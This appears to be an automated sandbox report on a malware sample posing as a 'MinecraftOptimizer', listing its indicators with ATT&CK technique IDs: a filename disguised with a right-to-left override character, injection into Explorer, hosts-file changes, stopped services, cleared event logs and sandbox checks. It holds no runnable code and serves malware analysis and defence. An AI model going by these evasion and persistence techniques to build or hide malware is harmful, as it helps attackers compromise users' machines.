32f2fa940d4b4fe19aca1e53a24e5aac29c57b7c5ee78588325b87f1b649c864

Analysis

max time kernel
300s
max time network
290s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
27-08-2024 18:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

.html
Size

146B
MD5

9fe3cb2b7313dc79bb477bc8fde184a7
SHA1

4d7b3cb41e90618358d0ee066c45c76227a13747
SHA256

32f2fa940d4b4fe19aca1e53a24e5aac29c57b7c5ee78588325b87f1b649c864
SHA512

c54ad4f5292784e50b4830a8210b0d4d4ee08b803f4975c9859e637d483b3af38cb0436ac501dea0c73867b1a2c41b39ef2c27dc3fb20f3f27519b719ea743db

Score

10^/10

defense_evasion discovery evasion execution persistence

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 23 IoCs

Processes:

MinecraftOptimizer‮raj.scrupdater.exeSystemSettings.exeMinecraftOptimizer‮raj.scrupdater.exe

description	pid	process	target process
PID 2700 created 3380	2700	MinecraftOptimizer‮raj.scr	Explorer.EXE
PID 2700 created 3380	2700	MinecraftOptimizer‮raj.scr	Explorer.EXE
PID 2700 created 3380	2700	MinecraftOptimizer‮raj.scr	Explorer.EXE
PID 2700 created 3380	2700	MinecraftOptimizer‮raj.scr	Explorer.EXE
PID 2700 created 3380	2700	MinecraftOptimizer‮raj.scr	Explorer.EXE
PID 2700 created 3380	2700	MinecraftOptimizer‮raj.scr	Explorer.EXE
PID 5012 created 3380	5012	updater.exe	Explorer.EXE
PID 5012 created 3380	5012	updater.exe	Explorer.EXE
PID 5012 created 3380	5012	updater.exe	Explorer.EXE
PID 5012 created 3380	5012	updater.exe	Explorer.EXE
PID 5012 created 3380	5012	updater.exe	Explorer.EXE
PID 5012 created 3380	5012	updater.exe	Explorer.EXE
PID 4588 created 3004	4588	SystemSettings.exe	sihost.exe
PID 6832 created 3380	6832	MinecraftOptimizer‮raj.scr	Explorer.EXE
PID 6832 created 3380	6832	MinecraftOptimizer‮raj.scr	Explorer.EXE
PID 6832 created 3380	6832	MinecraftOptimizer‮raj.scr	Explorer.EXE
PID 6832 created 3380	6832	MinecraftOptimizer‮raj.scr	Explorer.EXE
PID 6832 created 3380	6832	MinecraftOptimizer‮raj.scr	Explorer.EXE
PID 3308 created 3380	3308	updater.exe	Explorer.EXE
PID 3308 created 3380	3308	updater.exe	Explorer.EXE
PID 3308 created 3380	3308	updater.exe	Explorer.EXE
PID 3308 created 3380	3308	updater.exe	Explorer.EXE
PID 3308 created 3380	3308	updater.exe	Explorer.EXE

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
5392	powershell.exe
6496	powershell.exe
5884	powershell.exe
5904	powershell.exe
5820	powershell.exe
4772	powershell.exe
3924	powershell.exe
1436	powershell.exe

Drops file in Drivers directory 4 IoCs

Processes:

MinecraftOptimizer‮raj.scrupdater.exeMinecraftOptimizer‮raj.scrupdater.exe

description	ioc	process
File created	C:\Windows\System32\drivers\etc\hosts	MinecraftOptimizer‮raj.scr
File created	C:\Windows\System32\drivers\etc\hosts	updater.exe
File created	C:\Windows\System32\drivers\etc\hosts	MinecraftOptimizer‮raj.scr
File created	C:\Windows\System32\drivers\etc\hosts	updater.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

MinecraftOptimizer.exeMinecraftOptimizer.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	MinecraftOptimizer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	MinecraftOptimizer.exe

Executes dropped EXE 6 IoCs

Processes:

MinecraftOptimizer.exeMinecraftOptimizer‮raj.scrupdater.exeMinecraftOptimizer.exeMinecraftOptimizer‮raj.scrupdater.exe

pid	process
5904	MinecraftOptimizer.exe
2700	MinecraftOptimizer‮raj.scr
5012	updater.exe
468	MinecraftOptimizer.exe
6832	MinecraftOptimizer‮raj.scr
3308	updater.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 5 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

Processes:

svchost.exe

description	ioc	process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Inventory.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Steps-Recorder.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Troubleshooter.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx	svchost.exe

Loads dropped DLL 4 IoCs

Processes:

MsiExec.exeMsiExec.exe

pid process

5508 MsiExec.exe
5508 MsiExec.exe
6940 MsiExec.exe
6940 MsiExec.exe
Modifies file permissions 1 TTPs 4 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

ICACLS.EXEICACLS.EXEICACLS.EXEICACLS.EXE

pid process

5428 ICACLS.EXE
7072 ICACLS.EXE
5776 ICACLS.EXE
5772 ICACLS.EXE
Drops desktop.ini file(s) 1 IoCs

Processes:

svchost.exe

description ioc process

File opened for modification C:\Users\Admin\Videos\Captures\desktop.ini svchost.exe

pid	process
5508	MsiExec.exe
5508	MsiExec.exe
6940	MsiExec.exe
6940	MsiExec.exe

pid	process
5428	ICACLS.EXE
7072	ICACLS.EXE
5776	ICACLS.EXE
5772	ICACLS.EXE

description	ioc	process
File opened for modification	C:\Users\Admin\Videos\Captures\desktop.ini	svchost.exe

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

msiexec.exemsiexec.exemsiexec.exemsiexec.exe

description	ioc	process
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe

Network Service Discovery 1 TTPs 2 IoCs
Attempt to gather information on host's network.
discovery

Network Service Discovery
T1046

Processes:

GameBarPresenceWriter.exeGameBarPresenceWriter.exe

pid process

6120 GameBarPresenceWriter.exe
3500 GameBarPresenceWriter.exe

pid	process
6120	GameBarPresenceWriter.exe
3500	GameBarPresenceWriter.exe

Power Settings 1 TTPs 20 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

T1653

Processes:

powercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.execmd.execmd.exepowercfg.exepowercfg.exepowercfg.execmd.exepowercfg.execmd.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

pid	process
6640	powercfg.exe
4408	powercfg.exe
6576	powercfg.exe
6984	powercfg.exe
2156	powercfg.exe
6900	powercfg.exe
5952	powercfg.exe
1100	powercfg.exe
1788	cmd.exe
6572	cmd.exe
7116	powercfg.exe
6508	powercfg.exe
5652	powercfg.exe
1448	cmd.exe
5044	powercfg.exe
1420	cmd.exe
2884	powercfg.exe
1428	powercfg.exe
6852	powercfg.exe
6492	powercfg.exe

Drops file in System32 directory 6 IoCs

Processes:

powershell.exesvchost.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Suspicious use of SetThreadContext 5 IoCs

Processes:

MinecraftOptimizer‮raj.scrupdater.exeMinecraftOptimizer‮raj.scrupdater.exe

description	pid	process	target process
PID 2700 set thread context of 2288	2700	MinecraftOptimizer‮raj.scr	dialer.exe
PID 5012 set thread context of 6512	5012	updater.exe	dialer.exe
PID 5012 set thread context of 4968	5012	updater.exe	dialer.exe
PID 6832 set thread context of 1660	6832	MinecraftOptimizer‮raj.scr	dialer.exe
PID 3308 set thread context of 5924	3308	updater.exe	dialer.exe

Drops file in Program Files directory 2 IoCs

Processes:

MinecraftOptimizer‮raj.scrMinecraftOptimizer‮raj.scr

description	ioc	process
File created	C:\Program Files\Google\Chrome\updater.exe	MinecraftOptimizer‮raj.scr
File created	C:\Program Files\Google\Chrome\updater.exe	MinecraftOptimizer‮raj.scr

Drops file in Windows directory 19 IoCs

Processes:

msiexec.exeEXPAND.EXEsvchost.exeEXPAND.EXE

description	ioc	process
File created	C:\Windows\Installer\SourceHash{9D372E24-92F9-4F65-8670-D087AEF28D74}	msiexec.exe
File opened for modification	C:\Windows\LOGS\DPX\setuperr.log	EXPAND.EXE
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe
File opened for modification	C:\Windows\Installer\MSI2A0D.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIA8E4.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\e591da0.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB250.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI1EAA.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB27F.tmp	msiexec.exe
File created	C:\Windows\Installer\e591da1.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\e591da1.msi	msiexec.exe
File opened for modification	C:\Windows\LOGS\DPX\setupact.log	EXPAND.EXE
File opened for modification	C:\Windows\LOGS\DPX\setuperr.log	EXPAND.EXE
File opened for modification	C:\Windows\Installer\MSIA885.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\LOGS\DPX\setupact.log	EXPAND.EXE
File created	C:\Windows\Installer\e591da0.msi	msiexec.exe

Launches sc.exe 20 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
6028	sc.exe
5984	sc.exe
6200	sc.exe
768	sc.exe
4960	sc.exe
4408	sc.exe
6624	sc.exe
6084	sc.exe
2544	sc.exe
3272	sc.exe
6704	sc.exe
6112	sc.exe
6316	sc.exe
6400	sc.exe
4800	sc.exe
860	sc.exe
6060	sc.exe
2924	sc.exe
6432	sc.exe
3444	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

EXPAND.EXEICACLS.EXEMsiExec.exeICACLS.EXEEXPAND.EXEICACLS.EXEMsiExec.exeICACLS.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXPAND.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ICACLS.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ICACLS.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXPAND.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ICACLS.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ICACLS.EXE

Checks SCSI registry key(s) 3 TTPs 21 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

SystemSettings.exeRuntimeBroker.exevssvc.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID	SystemSettings.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	RuntimeBroker.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID	RuntimeBroker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	RuntimeBroker.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID	RuntimeBroker.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000f7b83aff83bcb26e0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000f7b83aff0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900f7b83aff000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1df7b83aff000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000f7b83aff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	SystemSettings.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID	SystemSettings.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	SystemSettings.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	SystemSettings.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	RuntimeBroker.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	RuntimeBroker.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	SystemSettings.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	RuntimeBroker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID	SystemSettings.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID	RuntimeBroker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	SystemSettings.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

svchost.exesvchost.exesvchost.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	svchost.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	svchost.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	svchost.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

Processes:

Explorer.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Microsoft\Internet Explorer\Toolbar	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	Explorer.EXE

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeOfficeClickToRun.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
